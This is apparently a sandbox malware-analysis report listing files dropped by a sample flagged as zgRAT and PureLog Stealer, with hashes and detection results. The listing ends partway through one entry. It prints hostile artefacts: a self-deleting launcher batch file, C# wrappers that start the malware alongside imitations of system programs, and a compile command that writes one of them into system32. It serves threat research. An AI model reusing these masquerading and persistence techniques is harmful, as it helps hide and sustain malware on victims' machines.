                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1960448
                                    Entropy (8bit):7.550221219335871
                                    Encrypted:false
                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\ssh\WinStore.App.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\ssh\WinStore.App.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\ssh\WinStore.App.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\ssh\WinStore.App.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.

                                    C:\ProgramData\ssh\fd168b19609dff

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with very long lines (361), with no line terminators
                                    Category:dropped
                                    Size (bytes):361
                                    Entropy (8bit):5.816333808799416
                                    Encrypted:false
                                    SSDEEP:6:KlqKjVDD28cjjpWAdZJJCxVNS4qphxk+IqDdRE25NDIC3iIJ8fafhpZp1:KlqKjo5jIAbCnubk+IOvXjiIJ8SJpZD
                                    MD5:09E2BB26D33E2E29FE725C8EE920C956
                                    SHA1:7D0CFF950DD797C01CB8B1E0067512E5801D90B5
                                    SHA-256:E7E16A5F7E41DCC230038D249F5A1114F074E21D2DC39F2FF8AC8953F6D1E2BD
                                    SHA-512:C2361ED20AE7D9980806204BB2346A17ED0C7A80804C1DC34CA0C02A2AA5243EE51777A25CFB19B73D4C59AD0B4F7144D926BC15C5ED75B1F67AD94705DF2773
                                    Malicious:false
                                    Preview:hhGjoSjpWVE9fUsPe7ZerAmPxTUwQxqrfhUEP065jGn4X8StpZNTnLog41wV8xYipWd89n9nAd5kXs1zBkG0kWEU2yKYEl7wsEPBeTuCajSJPEJM97TXqh8SRJGLdljZgJ2Sc0Ur0EaAE5Eyo7YHRjFKG6tUNiiyA2nGL1tJmmhmG7OWERhgNbI7DrLgG9eRfmALS7mwOOfpBcDJsXQ5BCljupDdqNDmHPGe7CEHpuR86d5koBxstiQdAaam4JGAL2hwWiMpTIQQunmRuczoZU2j8megmbMgoRwD5IOFzIZlRAtXyJ1cTbk1A8xtEpD16umd0iVlOtzR4RR83GrckuMMq4D7VeAJEhohYPhPx

                                    C:\Recovery\5940a34987c991

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with very long lines (946), with no line terminators
                                    Category:dropped
                                    Size (bytes):946
                                    Entropy (8bit):5.907965904098634
                                    Encrypted:false
                                    SSDEEP:24:AbUdjqUkfWZv39wYEj8mkE4P5Oeqdrw0Cu:AGqVWZ6t7ZwqdrDCu
                                    MD5:79624B68360DFA3C83A5C653D57EEA06
                                    SHA1:88AC3DD4B50C679944E9928F841DA6CD7D829AF5
                                    SHA-256:765CFD1ACFDF6E2F54C06040F84A2B5E9D7CFC664AF5881ECBDC462071EC66A4
                                    SHA-512:463080B62426409DC24DB18C7DB726C952B72EE61926704CE3CC6A153F83C70063CAF735AE67D18D3562943BAB1378D114A0AE43DF5927F93B1C92ACC343802A
                                    Malicious:false
                                    Preview:sqzz87kRLiZx5eYQttqNXmujojcoUgmlX8VQfpBLdQd89cluZ9e05FjF6PLZf66p5ya7JIuEretGJvkL7rPVCvpRYPTQdmphUyCLCnlROZJbWd6Ko9byrkmJIIj4yelEyLvVsZJTG7HmmO45TJldK10tL2C3EqctyEmKrkbP0HstdAh4Nokp3H47VCK0XPPZeXxiluNsrVmCJGQKVHpaFx0rKozpal2l2SOFN8Sda27he1yOv9ePjyTrhFY64hRFdBK02K7WyL9NzSMS0k3aHmBD9hhHkVi2k2Ecr7WkCHaYyF1P3FGUn180AG1VmzwcmGm7Otk3OSY9MnP3pSOePOPt3NclGA8MV7vrd3AJfMGUc8oX07qTlRNY13DAR9wNUMoO1havSF9CI4Q4jFuJUokDuWzjzA1fa29QUafTg4BgSKQ7mJaMOn3qlkder06RNdmP4AjJjbmamEvkG27qjpQw8Tou6Alp7uTyhADljRmxBdEhy3Yz3PrhN0QkVzMjz6c1u6CGyVHSDcufPH5DmwwsCvlrtcQuEC8FBMw10SAiIYeuFvVO3J7CKtz9VVWWFXNAepeCVDNUvOknQ1l8GC05F55RXwge5oduKeQaQT2z5mR6JLseuYPCgS4iuNpihsYGvzcwlLrxJB9co9HMDCuhZaO2jrpDnUSNOKKUs63jqb3fSb3vFdef71rUlkM3fnKyswOeyxeHJL07gsjHy47KzxPWc0tHtADDREwgNZ7S9XWwBtx2AFEkpA85g2B7EWXIHwqc6C4Y7pKcadUsC0Go5cXQF0AVX9Nn9NoODV68KqnAzgfChS5NPsNpZZWFCjA7chcNzGpq4IeOzXbjV7xFD9XR99yn906lpqhRDRNbnPTHO80C8xtEv53cKLO0RBrEM2jIzJgEuWbyqQCAJwpLG1ztwEH1CXJlhO4VZrNyRpUYeE

                                    C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1960448
                                    Entropy (8bit):7.550221219335871
                                    Encrypted:false
                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.

                                    C:\Recovery\c917822ecb0d66

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with very long lines (961), with no line terminators
                                    Category:dropped
                                    Size (bytes):961
                                    Entropy (8bit):5.907879622611825
                                    Encrypted:false
                                    SSDEEP:24:P1qTNZNcTxrJiaaPlEuc6PHnfqFqVgM77DJa:PgfOTtAaeEuc6PHSq6EJa
                                    MD5:4A0B3DB5352280C77B4C6EA30CA11F94
                                    SHA1:ACF8B1660EBDD4DEC5C5F51DD2B0542E16E8DE9E
                                    SHA-256:14B8A05C57B25983938932FE5E2098FC456F69F9CDB94655D513F163B4D711A3
                                    SHA-512:6882725D5278E43B04FD4AC8CD1C0808C490D4DCE31FC61D0BD86711CB6180C8496E0A5B87AB83DA6F7AF048840E4034CF5D054D2CDE10C919E93E6220EAD4D3
                                    Malicious:false
                                    Preview:UDzWuCoBXNzRbVqlbi14bhbPrSNszpoQBRkSjVcwmo6LoxUicmP6ekgwljoby6MrjjPKuYBGGFRxkQl38oPNarvauxq9qA7qbPmFiJyEkIzYStLV8ucKq9R1xyZ7rBaFIlVVofVy0LmR1WHBlVB5hwAc7uRuu1XisuQrY0rdZoUeW99aqYVVAehVl2X3NlE9yDiHGanvoig3cfG8v1DVfBiOM4GfcxPyjVqTb1UQukrc7n3FwZHWhtdweT4LTHS0TrUGywg3gxk5UFQiAAtCq2Rz14yH7I6nR1JQTxR92O0tIicYDWKTYQKaaeP48Z6Y17nd6APNttJbChrScZEk7nPBqszyhWBdRb1K58cCG7joGsY2w6ciVVaOsmwNLbpWsqKkphXd7BeADk48T6Bl4cI6BncSMO1oRM6aiyMPi8lT0aLHrx3OaEcPhOiCEEQsKzs0oeaftvC50yFlcVkYUnONuq2TPKLds3JBrUcNXYeoBgYtJ7kte1YgkfG7lGPjjiN7pD3I2XB6JkLNSIKRkc90fmaMNflQI4EdTaEFEc0GzbXAT2pc588HiWcCnq4WvvxOfs41EFNIl3ADOa3V0IUK56468BbYhdUEoJel8xY0v0fpWZyMxjgnbnSiy73DnykHi6YE5SWDueZFbOkiNOl87rnB15xA4UM6QYGZAtReMd26OMHjXU0YNlK1TXMAfWIaScyCIKid7GweyqxoxNnjexsoOPGngQ90UcovYFbMwWbHzpCmkiMRti5fuKy2E57rG5JVCCQswaxHWkziMdC8EsHvgJAOQiI1ZtB3frkiRdeSvxIJVPqk29nXyYy3BCcOR6smj5Cf3eqkNyAsA03A2i8ZGnFH2qgOBQByFgkZMLqXSDKAXF3KJbWt7Sf6z5nN7ci6xMndQdxq2kHDcFtwxVEk4R0wAokRidazeNMLcZ4qnp1XLcduM0ZlX7CfV

                                    C:\Recovery\dllhost.exe

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1960448
                                    Entropy (8bit):7.550221219335871
                                    Encrypted:false
                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BridgeInto.exe.log

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1396
                                    Entropy (8bit):5.350961817021757
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\EoNanmDGxPEtougVgAjHLx.exe.log

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):847
                                    Entropy (8bit):5.354334472896228
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dllhost.exe.log

                                    Download File
                                    Process:C:\Recovery\dllhost.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):847
                                    Entropy (8bit):5.354334472896228
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                    C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log

                                    Download File
                                    Process:C:\Windows\System32\dllhost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):524288
                                    Entropy (8bit):2.354655208553605
                                    Encrypted:false
                                    SSDEEP:1536:jG5pG9g1Ui91X2dQlp6gOnrJOnoeOQ2fQdDQX2khHB1eO5o4QOGSvgcc:jG5qg1Ui91X2M6tnrQnvu1R5Lfvg
                                    MD5:422603FD4F715A33A2E4C22B5E343421
                                    SHA1:9ADA1EAACFF3297268B6A708972E4F4023E8D829
                                    SHA-256:100257E3BB98CDC19A9698E3F18FF2483A17346640012E5B033442F1E090ACE1
                                    SHA-512:BA2941EF8448D0DD58CD17BC9E51A63529ADA45E3A1B8E1DDBB6DF63877AB19734DC252082F49DFC797C65B116D92BDE7978BC9602DB8AD1653E4375C0847EEF
                                    Malicious:false
                                    Preview:...............+...{o..!...{..........<...T.;....{..................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..........................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\...........................................................................................................................................................................................................0u.............................................y..............Tz+.#......... ..........Y.......h.z.......x.......gN;....{..................C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t......................................................................................................................

                                    C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat

                                    Download File
                                    Process:C:\Windows\System32\dllhost.exe
                                    File Type:Extensible storage user DataBase, version 0x620, checksum 0x0c042d3c, page size 32768, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):17301504
                                    Entropy (8bit):1.0289031498884538
                                    Encrypted:false
                                    SSDEEP:6144:zvQPYV7AyUO+xBGA611GJxBGA611Gv0M6J6X3XX35X3khTAzhTA/hTATX3t8nqkH:YyUN3F0TcT0TAitKxK/U5uC4Ago
                                    MD5:C0140FBAAE79417E269099B89D3FB468
                                    SHA1:7FACD57EFC487976965586B0B52CCA825B8E3ECA
                                    SHA-256:F67A21F9ED4FDD902E29AD4D120EB076871658AD923F1EEDEF0D57E1F072766B
                                    SHA-512:D47DE14D250F7B4F01B802C08CADD6BA1E91D1C4C12223FD407DBEAC254131BC3B15AC44E86BDB88DA9CFAECF5846569BDDE65182F5DE9DA4770F9D92A2F9EEC
                                    Malicious:false
                                    Preview:..-<... .......4.........gN;....{........................&....../...{u..+...|..h.(.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{...................................R...+...|..................U"..+...|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm

                                    Download File
                                    Process:C:\Windows\System32\dllhost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.13339617446461677
                                    Encrypted:false
                                    SSDEEP:6:fXku2OZXfDSu/zgAL9wjXlFkFRFlYC0p23nGC:cu2EXrSmgfLlePFlYC1
                                    MD5:1D4ED1AA2669F1B147D78C0322041B41
                                    SHA1:A4F478CFAE94D1EF4F85A1E784A7BE41D8BA1CD8
                                    SHA-256:C246A23CB6C2797048F6364D4A9A09CD01359CD66967BAB901F2CB6B6AAE9908
                                    SHA-512:4FA935FD1140EB2D47801DA75A0CAA1029AAEF4F1EE8ACF0E7FAB6874CF49C34EFACD5E2EDDC16874859EBC7907C40FC8291808F0FA06D3366DB2A4E4EBAFDC9
                                    Malicious:false
                                    Preview:eE@2....................................;....{...+...|.../...{u..........+...|E../...{u..R...+...|......................+...|E.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\2EcQa8wgx4.bat

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):204
                                    Entropy (8bit):5.315722735913846
                                    Encrypted:false
                                    SSDEEP:6:hCRLuVFOOr+DED+YbdhAJOBvKOZG1N723fL6:CuVEOCDED+sdhxBEaT6
                                    MD5:8C897F951C781F4EE4DC68F821AA380F
                                    SHA1:B66EF8E83A6F0CAC6E17CB01C1BBC1D161BFAD60
                                    SHA-256:ACC817E3869D8D33B9C403881FA29D7B7C3087FB329A01F0E7072F974FF24CB5
                                    SHA-512:F216428AEBF88FA5049A9847BF3DA8DCDA9521FB331D25AC09EF629827BC7DE121C7C6DA6282704347B5B7C14D05F92E490E02B73191D72F6E4A1E976FFBB204
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\2EcQa8wgx4.bat"

                                    C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.0.cs

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                    Category:dropped
                                    Size (bytes):421
                                    Entropy (8bit):5.036230783802131
                                    Encrypted:false
                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LTxlaiFkD:JNVQIbSfhV7TiFkMSfhWLTXFkD
                                    MD5:42AD4339711578F16ABE3CEE103CC667
                                    SHA1:584DE715B851926E46CE235F0D6BF6D99EB338D6
                                    SHA-256:1FEF52967656CF118DCFDF3EBA79E43383D642DE41B180D96E512D7786AC5FE9
                                    SHA-512:6EDBB9F2EE5E999648CA8D7E78851F961F4FF2E346653B0CBFD1BE822200B456A498A953E1E677191C51325252ABBFE02DA43716D5FE25C0EE24960185373B32
                                    Malicious:false
                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe"); } catch { } }).Start();. }.}.

                                    C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.cmdline

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                    Category:dropped
                                    Size (bytes):253
                                    Entropy (8bit):5.080904774791549
                                    Encrypted:false
                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oN723fDph9:Hu7L//TRq79cQna79
                                    MD5:26742C1662EA8FDC78BEA7F8C68EB9E4
                                    SHA1:69DDFD3BA6AA69691BC6A6014B8A78AED34C5E4B
                                    SHA-256:AA5B9B36E26250B1A4BE73F48DB624D908766BC7A63430FBC8A1C2B4683AA51C
                                    SHA-512:D990A613B2EFB76CF470D411B5EA2E51AA278D37E041D196833ABCF1B0C0D93882C2711E4F41313BB1CA6D93B5EFFD17C742305D5D9388312010238C0A07BA4F
                                    Malicious:false
                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.0.cs"

                                    C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.out

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (326), with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):747
                                    Entropy (8bit):5.262755224928053
                                    Encrypted:false
                                    SSDEEP:12:l1M6MI/u7L//TRq79cQna74KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:Q6MI/un/Vq79tnasKax5DqBVKVrdFAMb
                                    MD5:32E557998966408AC5CF08CB777D6F4B
                                    SHA1:B390489E0B10E4630402F4269C59F8C616354FC7
                                    SHA-256:F3DB7941829663BEB3B364A45811638F8E7CBF454ED7127037DDF6EED88F3956
                                    SHA-512:465951CC362FE613AF91CAD847C3E4374647D0840FA98753204A91785333ADAE560478643214EF6D9687301E18D7A3154853190B68D8B2B6C5D76A2A6EF9610B
                                    Malicious:false
                                    Preview:.C:\Bridgemonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                    C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.0.cs

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                    Category:dropped
                                    Size (bytes):436
                                    Entropy (8bit):5.042629164496944
                                    Encrypted:false
                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LTxlaiFkD:JNVQIbSfhWLzIiFkMSfhWLTXFkD
                                    MD5:A32F59C54A4DF557A031D362D7D4A688
                                    SHA1:7EFA76B06444D791966B78508B129365376BED45
                                    SHA-256:A3A052C51EBFD1061C51794EA610D16DE021710EE8EC0A656AAD6DB2B9F7FCE0
                                    SHA-512:F893A23DF69ECB024BCE80E7D95CA7D01F4B7F6FEA48623B4E805D218EC30A6BBD5744FBFAED7861EDB54182C83BC5ABB653FFC070C8628B33DDE1E80761C683
                                    Malicious:false
                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe"); } catch { } }).Start();. }.}.

                                    C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                    Category:dropped
                                    Size (bytes):268
                                    Entropy (8bit):5.152484389506333
